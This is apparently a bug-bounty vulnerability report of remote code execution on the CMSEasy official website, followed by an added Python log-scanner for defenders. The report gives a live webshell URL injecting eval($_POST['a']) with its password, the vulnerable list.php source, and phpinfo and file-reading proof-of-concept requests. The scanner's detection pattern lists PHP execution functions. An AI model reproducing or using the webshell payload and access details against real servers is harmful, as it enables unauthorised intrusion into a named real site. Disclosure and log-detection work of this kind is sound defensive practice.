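### Brief description:
Unconditional getshell on the CMS official website. I would like this handled as a major-vendor report; requesting 20 rank.
### Details:
Look at the webshell first, otherwise my webshell will simply get overwritten.
China Chopper (菜刀) address: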
http://www.cmseasy.cn/post/list.php?list=@eval%28$_POST[%27a%27]%29;
Password: a
[<img src="https://images.seebug.org/upload/201511/022141252ffb7b421ea03d440417e9de5e06ce48.png" alt="22222222222222222222222.png" width="600">](https://images.seebug.org/upload/201511/022141252ffb7b421ea03d440417e9de5e06ce48.png)
### Proof of vulnerability:
view-source:http://www.cmseasy.cn/post/list.php?list=echo%20file_get_contents(%27list.php%27);
```
<?php
/*
*
*Article list generation file
*/
if(isset($_GET['list'])){
mud();
}
function mud(){
$fp=fopen('content_batch_stye.html','w');
file_put_contents('content_batch_stye.html',"<?php\r\n");
file_put_contents('content_batch_stye.html',$_GET['list'],FILE_APPEND);
fclose($fp);
require 'content_batch_stye.html';}
?>
```
```
http://www.cmseasy.cn/post/list.php?list=phpinfo();
```
[<img src="https://images.seebug.org/upload/201511/031534127d2d7c95b3ac3372613acfbc020c4dee.png" alt="QQ20151103-1@2x.png" width="600">](https://images.seebug.org/upload/201511/031534127d2d7c95b3ac3372613acfbc020c4dee.png)
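For defenders reviewing access logs, the following is an added example (not part of the original report) that flags requests to `/post/list.php` whose `list` parameter carries PHP code, which the script above writes to a file and then `require`s. The log lines are constructed, and the token list and function name are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate callers never need PHP syntax in the `list` parameter,
# so superglobals, open tags and call-like use of these functions are flagged.
PHP_CODE = re.compile(
    r"(\$_(GET|POST|REQUEST|COOKIE|SERVER)\b|<\?|"
    r"\b(eval|assert|system|exec|passthru|shell_exec|phpinfo|"
    r"file_get_contents|file_put_contents|fopen|include|require)\s*\()",
    re.IGNORECASE,
)

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_list_requests(log_lines, path="/post/list.php", param="list"):
    """Return (line_no, decoded_value) for requests whose `list` value looks like PHP."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.path != path:
            continue
        # parse_qs percent-decodes, so %28 / %27 encoded values are normalised
        values = parse_qs(target.query, keep_blank_values=True).get(param, [])
        hits.extend((line_no, v) for v in values if PHP_CODE.search(v))
    return hits


# Constructed sample log: addresses, timestamps and sizes are made up. The
# request targets on lines 1, 2 and 4 are the ones shown in the report.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Nov/2015:15:30:01 +0800] "GET /post/list.php?list=@eval%28$_POST[%27a%27]%29; HTTP/1.1" 200 0',
    '203.0.113.5 - - [03/Nov/2015:15:31:12 +0800] "GET /post/list.php?list=echo%20file_get_contents(%27list.php%27); HTTP/1.1" 200 412',
    '198.51.100.7 - - [03/Nov/2015:15:32:40 +0800] "GET /post/list.php?list=news HTTP/1.1" 200 0',
    '203.0.113.5 - - [03/Nov/2015:15:34:02 +0800] "GET /post/list.php?list=phpinfo(); HTTP/1.1" 200 68211',
    '198.51.100.7 - - [03/Nov/2015:15:35:00 +0800] "GET /index.php?list=phpinfo(); HTTP/1.1" 200 1024',
]
```

Log review only narrows the search; the root cause is that `list.php` appends `$_GET['list']` to a file it then `require`s, so the fix is to stop including any file that contains request data.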